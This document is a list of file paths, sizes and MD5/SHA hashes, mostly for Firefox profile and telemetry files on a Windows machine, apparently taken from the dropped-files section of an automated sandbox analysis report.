SHA512059b77d9885843df78541fedf1ba4a9a74a47e8707b29cbc9713046129d548a5f38e6205cab9249254b82181f8271ade423a7541bd14e6870812ec5ca35a1b86
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD57ffe8024cde97721ecc29f25873cf01f
SHA1be37f643efd4c10b92c8e80e7e9b8777a975c6c3
SHA256d35fbd28b3bb85f8d083bba9cedb8cb00af319b0c52d7c4d77c7a2d055e36a0b
SHA51202122debb2249dd7aa2b3dea22a515bf2e97c6f24eee39949707fb1c73363b0c9856ff7011c56df2860a50d3abf6a86cdc56586365a67285a13819f34dda1693
-
Filesize
1KB
MD5928d36ad618a369ffebf44885d07cf81
SHA1edf5a353a919c1873af8e6a0dfafa4c38c626975
SHA256d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea
SHA5124ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a
-
Filesize
20KB
MD5f38439e6e7fa6e03bb6e3511af71c973
SHA1a64e24cf26adfceca709c36f074ed41e76624ffc
SHA2569efb7ac68e3d27158feb2f39079cd84760b77a2d004761189a63f03fb349cca3
SHA512f203226fc4d72410f2012996992c285ef71314c8d5bf7e18eb30b2cd228244e54f07ede1003edbd1840250365f62f31346aef3822a1d9716e004fe48daf76646
-
Filesize
21KB
MD586a950a2694a557b5ce2e36e99399bee
SHA116f6cef7a65b30421e800ba8c287c5c3411cdffd
SHA2566f727ead937787a6f8f926f5598bc9bde2c90d366e3d7c99339d58ba9d85b7e3
SHA5122f0407118c4187031dc218e5cad4cf0e595adbf491bcaa03eeaa3daa779dc8eca3770f0595252fe753c196206eea89645bcec9af5f556777ececc701e3118544
-
Filesize
18KB
MD571d4d2aff484bcd706d7e0c5ddb180e2
SHA1e006a4b297c1d925d37d4478e244c22dc8da04a5
SHA256ee757454aa502b0c63f8ddabb83a645772c0a53611ee799c9635d5b87b895cb0
SHA512c2645e96847a74d6e7ab73aaec8d233a8295fe4117dd829a7cb0c45cdc73df4690d8d135c00254889a2e9a0724ec276fbf3e490e05165c0591c0f4ea6658e236
-
Filesize
20KB
MD536575098f11563c5cc07903673d9ca7f
SHA14cf8b6c944d8136206b79a2e921fc08e6ae47733
SHA2566eef0814ffa6aad60b9fd2127e19aa021f74ba572e9ded3230fc8d4e504dac1f
SHA5123244f449f91a79a04df39ad11b2d66ff001b9140b4c62a9cf51977c2f5ba92e569500ceb56345aa57b49fee9935ff1a3ee87c56504729706f7de2299bb11e10c
-
Filesize
18KB
MD5191f4a54b1f9b22324126635bdc18242
SHA1c5fa66297b8e39367fd9ff5fdef2e393fcc58032
SHA2566634eb6a282107bc186fa527d0fca2bf82ad177455278ed31c8a8d9612cebbe5
SHA512a34ec9188f71166debe5c2a13ec74c48e4a68fe31fdacb1cf04f1362f4bcb5160a2df7c9565f6de3c663e9b1fb4d99de608cb86cd1ce2eecc7d90301efc10d6e
-
Filesize
20KB
MD50ff9afc17d6f9e06c769160e815c4671
SHA17c605161e03323a5b6a6c0a267bdbc8103555407
SHA25634408099feb34a77a523b83bc3c9e59163cd7f4f0bfce000405e18b4c330b46e
SHA51247ac3ff080dac6fef4f382c19874167ec8823fd2519c44a8ac382531dcf23b16818efc11f2ffb8dca5514f93e6cd826f25789a45f3d43b94f77242f09be65f23
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\activity-stream.discovery_stream.json.tmp
Filesize19KB
MD5921a7daa6468bdc59d102e00cb2f5023
SHA11e661303653337f15c22e40423dc8e9d202ddff5
SHA25660b3230b2c8ba353d706e5915e2f94f0b1b0b427764532fe25b3aa58a96b81f1
SHA51298683792f8349fe9565e03f358cc1c943face80def640998a42ba4c7dc089a141b9399227c0130ce735acba564076299d7ea6d3f6727868aeb0e49c022e74132
-
Filesize
74KB
MD5158ff79474590b78ff3acc9c5b058f63
SHA1c659d21bd2ffa0cc6eeaf95150c9fc70a3735606
SHA256882aff5fd82027fb62b098ce7a702a607eccd5c399dbd3a861e65a6f955cb2d5
SHA512fc0323af71225e11c03119035734af298e552e277be4c3381f520e9fa7f062fc6f2e203cb1167b81b00a2a84b15ea1de6002d3cfa3b1b7aa982c5cb89b873445
-
Filesize
5.6MB
MD5260373b0281173d7a116e4a54e361425
SHA138a2a60736c19436b2eaf783b9ae92838cc750c8
SHA25636badaade40faa02d430c40eafd4a6bad3d0c3289c9435ddcf4930301f029755
SHA51298cc8704e6e2597c3776408adcd9ce52a09ae64f43dd310b750bfaf4f6a558b0e3f042ccdd6be863a4ec6df4d63092a4390cd186fbb28dd423e27653cc71182d
-
Filesize
1.3MB
MD5f28b971e36f99865fbf0f08cf04f6aba
SHA14f4f484c20e542af6fc3a6a7c329502f13a8fe6b
SHA256a9e5db3fb867c0caab93f5cbfbfbcf695ef818b767324ef96abaa363efa78da5
SHA51203f110dcfb9153beba95f3551bf84e3a1d6c0bad137df42d4a8eba87ecf560041d0fb0c5d2e49dd833b38c9b2a113552f515a0cb77f85445901041b101b6e740
-
Filesize
1.8MB
MD5be0e52ff32acf3df6f64d0966a6c826f
SHA15ba27364ea45d9a67499253105fe7dd918d83720
SHA256cfa4d4433376665f394ca4aabbdb29512ef637ce56a264a34a6556c547dc2c63
SHA5128b569976214fc53f6f4435728cf77bae0356dc5a03b769699412ed329f6e7905e3855ccb056460708354d763705bfc4f92305b5c7f660ec13d31a6ae34455684
-
Filesize
1.7MB
MD504a87d28b927808d6147cf9b061d5210
SHA1b51944c96da2e532c8c75f74fd85082a6da0757f
SHA25671d6c1ae9377467541a19af4bd75ddb4d47e932b3d7f4fa99451f135a52b3643
SHA51241a733322ed07ee40d5f7e4abe0fc7eb17dadb3cd9ca196cfd483539881476be40234143fcd2f5f12c8dcb9d2a2edb64a7d29a742b18d1a7c9213b07b0e4a36a
-
Filesize
947KB
MD5403907414530775cdb22fdc440d026e0
SHA1289b1837d53451d549628c5acff2a9dab4216180
SHA25642d6d7b2fe358fa89221373fd280bad971b600ed33ff230b3460edd114193b04
SHA5128a50c5341edd8d43ccd99a8a70193ae0e0d77791562ed9797c38a5e5634c858dde836e35802e8b0b9cb13603d992ffacfe4e13a34df28ea8c5a317dee8524b9c
-
Filesize
2.6MB
MD51316a90296bebd0da1a956471a7f115b
SHA1fc96e31c2bc50af2cce37ac9d1af0d02fd754cb3
SHA256aa7ac8ddb924a2aed9f796e30c1807d372a8da5713a1da1ed2418e6b7c2afb59
SHA5120edb10a54a0fe0179425f7f2ed462c12c1b63b4a5297ecf4677c78b5618ba55da8d0169022f7a4cf94cae98da27f68cd7ba25b11b578f6c97eb78f823bc80269
-
Filesize
1.9MB
MD563aa68848600cdcd6417416eeb1b68bd
SHA1de6f81a5c475a362b41378b1cd4856fcdfb67442
SHA25606cf4dfdf3f256011e537de47e63a233b5a0cb7d9e8c241758f9a58904af9e0b
SHA5120dca349f969b701c6fdb256bc130d51ce82fbce3ef8ec34d39683fb96ddd5bafb7cca0bbee7befda878077df7d33d3e99842b98a42b25ae8f13d1456a97656fe
-
Filesize
4.3MB
MD59a54d55ddc56ff0c81d2631bdbcf0aa2
SHA183d6887c8111566b68cd626c9f384a9a82f7bc5e
SHA25693d68d2e0cbae75de77f464f041044d813f7268ac21fdfedf464b6e1cbdb9699
SHA512d3fd6ba793862441dbacb1d9bffdb139656afa9e907a59ca33e47fe8a6dc2876c44a8c9c3296b35f7aa921563b33049f20e421554d696002f12e18f32c2dc47a
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
1.8MB
MD52973a8b36517005333545a7751a03f4f
SHA1ea5f6788309a5beb6d85f0e3abbe588598a7023b
SHA256126e371440a1d6372b23741aa24bd4b0ed00e7f90657a796b18c6c05ba003ae9
SHA512307406fb0a9a55d3cf54da1b2bfac2313defce6eb66e60ad832cb3915a642ebe54e26c85304c96ee1e63cd6ee0878a3b2a91e3cfa1e6771c4776a374daa22b67
-
Filesize
1.8MB
MD576fc9bb5c44fb4d0aa48e66cdbd51e4b
SHA1a080bd5f91b276efd092066bee611f92e6ab456c
SHA256b327a5c3c4599ab59a692e8e5be73bede08a57230840fb24c24ac4bb374599d8
SHA5124b414c0d58c2c25d60d9bee0b07efe0e7fc2e7bed990ec17d0f17225ef749dfd316f858f816a06ce92b7bf10d131aa398175dd0fdb0a24e5f7440dd8fae832c1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
186B
MD5addf55e4e326e9e5672d3de26a05b6b7
SHA165d4a60c1a807ab1437dd1d0c89e845c5435d0e7
SHA256983c16216fc1f0b82bc53c3d16dbcb5516c7d4fa7301fed539359eb424fcc70e
SHA512cd62e67cb6e2b824813b03387a94e912462149da736f70d1f18d45824b21e4e35759f99964f42b4eae58d8e9719abadde5085ae644ba8a1a9104fb570a88c502
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize8KB
MD505c55fd079359b7a8a8dcbbe245e34ea
SHA1af305aa79c8802ef6c07d7c7a74dabe9f4befa4a
SHA256c6b1db5c661b9ee3029bdec70f5ee4acc14a87de76e1ef6f0f3299313586ac49
SHA5124e0cb619cf060643195dc54a1f3b3ee5e0b4f8164f9d717ac82bb2ed0d0b34319c0a2eda8183f3cbe9ad24b81c80e9bf117b97a290367d1c94b5c27db79a1d9e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\AlternateServices.bin
Filesize6KB
MD5466f30131a240314e5925c8de5bdd4d8
SHA101e34505f4ba5c7b52a8ebdad597e779a1e0b687
SHA256c95f69eb895fa9adbaf60d225dca68f0415781a2861c9109cae88a299847a4b9
SHA5125fbafa42372ed9bbaeba3f8d62b994aa1bd8ee39f802848d817b9ac0e66bb4845cb65cb202faae373ad066fb740a6e208f1fd4c8e6dbfa96e7b32a70211572b4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.bin
Filesize23KB
MD5178cf9626e37316783575eff90ecc373
SHA10da7eb36c96660f19200eae34303aca8af421a10
SHA256014239e62fff9a2b3314d53dda6a5f49053998c196c3a1aa6bc825d0dcd80e3a
SHA512564d90e582bea2341735cdf141d22be9d0d2dab1fbb2ca3119adbcf8ba83f3924beda60993de80010d36d82043c3904bf6b97cfe5ccb6a5f6e1ce118bf7c67b6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.bin
Filesize5KB
MD5c81e95a069cd6f3a8b72967a6ad77361
SHA17875bd6f5b5113797ce38eb761c087d81ace55c5
SHA2561b236f5fedae0bc998d3dd6f722fe353749a85138c73a6a6ca6b7e187cb2590c
SHA5128343a2ccd21e31ae1e2dd6cf596bd21ce08661736d5946332185c6e06ad38f7d47f72d7820d12ca7fb72f6d8973b8354d0536e4bc8e6acfee562500da41d450e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD57ebfdcb0fc1081b1a40f0aa03060e236
SHA1c76df1c72eceba13e0f14d39830bbbcb0727332e
SHA256d1fb807ebc87fd9ef66a5111834b0412ea8c885b2b92bc0cbee5cb6b2f09b8ed
SHA51209cb75f07fb4bb6ba3e75bb33fc495d2d65eefb398d3441d52074cd73ad17fc2dd76f3733ddf6668a9c11b46636d9fd2423351583af63b6b47d57a2b2876cfa5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD59d98c6b969cfa3547278c8664c2a8051
SHA1c6e87ec15ff13e00fdb18bd36e7942495478d125
SHA25646f32a9db71545a80d06e9486a5529202540e64805c3b13f0fa2e44249ea984f
SHA51262a0338aaf9c7252fa624a3bf8a2cf67dff716bd168e09bdd398c89c0edd15933175dfd51236bfb64c74c13046f4b2baaadb39e1fbed194ddd425374a74d5930
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\b88eebb2-6019-4c24-b4e4-a3aaf1c74616
Filesize26KB
MD52c46c35e8af4a5ccbdcc3ace07620a2f
SHA17b74dec39541e2ea298ad92f3866bedfc00432b4
SHA2567e197aa647674bdaf4565cecf486a9e347164d12a3abb4ac1c0d1cf31565de40
SHA512266a0569ca4586e1bd0c8213bc9e63bedb2071dad9b3bdd90887637d2c17644dc7efa7ddc1ef10c5e2a76c39f8e122407932b4bfdcdfac83620564bed0c848f3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\c2e93592-551a-43dc-ab9c-61aca5fa4c00
Filesize982B
MD5710f4cd4776a10b36221249bb42c623a
SHA1b3050760e513083b129040b5730f3f7ed49402f5
SHA2568b6f7fb55f03db33b1a59ca86515428d9414dbfc51a841dd4369f8d95780609c
SHA51270978c400b4c4ea3ab69fe53c3944751292d87fbf8dbc4784eb7821ed7b106097ec108a2ed3bd080848cc8db2490d2f73c86b7304b2d623bd438b42688449515
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\datareporting\glean\pending_pings\c40e21ac-3155-433d-ad7d-ec9b149e7846
Filesize671B
MD51436634a828808c7f9a760ab49aa69d2
SHA18a3bcfc21de09d214d5c7140a4f5e0f804845f33
SHA256b3ebfe97bca4556ccc9b9501120e1c845078daf9a54e04f79a956f5e5c649209
SHA512cc26e018a4a06a6c9e9e04300fa470898f95e4664f7eef2a2bcd10a189fa9fa66ee2c71f695b05b93ec0d3bf5d1b8056979b5e84bae835b5b21668e967123a91
-
Filesize
10KB
MD53e48aff2d0076542fdeaeb496b30bcb3
SHA183a995e369121d66ad27f76a349b88bb24e62dc4
SHA256da3da8c76a20e7015e9df66a152cfc1b1dc46fc69db59405fbe3780f1f782f4c
SHA512ebc1a66a12e0f2c0325536a419771549a871c89a16b2f341510626c21ef54031e1ce0be1b460c76011eab95942740c77486015971f75f82ad2ca8f7b82576c0d
-
Filesize
10KB
MD5971838896a0c2ede30f9e55726a408ea
SHA141b37fb1720bd2754eea1b50d5a4842443a416c2
SHA25631e886d0d609296cd135b50cce70ca8add8dab25f10f502012666dbd5a767ddd
SHA51244cdbf22a45bfc086e54d19ee852c5dae63c5cd0ab1cba2819d6b82d91000b1137f5c47bee49310a0f95cee424ada0bfd3bffef91b55786d8057f40f5cf47824
-
Filesize
10KB
MD5cf1618c087f78895599b966794c78382
SHA1de8fe7bf2ca22968cc861b484a84fae815663748
SHA25626bd4bb1dd5cb03b8fdba9dfceb58e60e6e432e78d43a9f07767ab138d7214ab
SHA512b6454b82a8b9b28558b641e94c8466d0e07b1193ee7fd0c344583c8655262ef35aaad996fb8a1277654832ec1d5b9f4614fa839908e891616322c4727b6f2692